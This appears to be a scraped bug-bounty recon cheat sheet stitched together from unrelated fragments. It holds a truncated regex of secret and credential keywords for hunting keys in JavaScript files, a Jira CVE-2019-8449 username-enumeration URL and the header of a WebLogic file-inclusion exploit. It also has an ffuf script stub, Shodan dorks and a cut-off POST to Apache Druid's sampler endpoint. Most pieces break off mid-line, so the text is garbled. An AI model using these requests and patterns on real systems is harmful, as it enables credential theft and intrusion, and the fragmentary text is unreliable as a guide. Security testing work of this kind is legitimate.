This is a simple guide to perform javascript recon in the bugbounty
- The first step is to collect possibly several javascript files (
more files
=more paths,parameters
->more vulns
)
(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k |
index.html | |
robots.txt | |
favicon.ico | |
Makefile | |
.gitignore | |
404.html | |
index.js | |
README.md | |
500.html | |
422.html |
cve-2019-8449 | |
The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability. | |
https://jira.atlassian.com/browse/JRASERVER-69796 | |
https://victomhost/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true | |
===================================================================================================================================== |
# Exploit Title: Oracle WebLogic Server 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 Local File Inclusion | |
# Date: 25/1/2022 | |
# Exploit Author: Jonah Tan (@picar0jsu) | |
# Vendor Homepage: https://www.oracle.com | |
# Software Link: https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html | |
# Version: 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 | |
# Tested on: Windows Server 2019 | |
# CVE : CVE-2022-21371 | |
# Description |
#!/bin/bash | |
echo "###############################" | |
echo "# Ffuf #" | |
echo "###############################" | |
echo "" | |
echo "" | |
echo "[1] subdomains.txt" | |
echo "[2] subdomain-large.txt" | |
echo "[3] raft-large-directories.txt" |
hostname:target.com | to find all asset available for target.com on shodan | |
http.title:"title" | to find server/host with similer title | |
http.html:"/file" | to find server/host with similar path | |
html:"context" | to find server/host with similar string | |
server: "apache 2.2.3" | to find server/host with same server | |
port:80 | to find server/host with same port | |
os:"windows" | to find server/host with same os | |
asn:AS3214 | to find host/server with matched asn | |
http.status:200 | to find server/host with 200 http response code | |
http.favicon.hash:"hash" | to find server/host with same favico hash |
POST /druid/indexer/v1/sampler?for=example-manifest HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 1006
Connection: close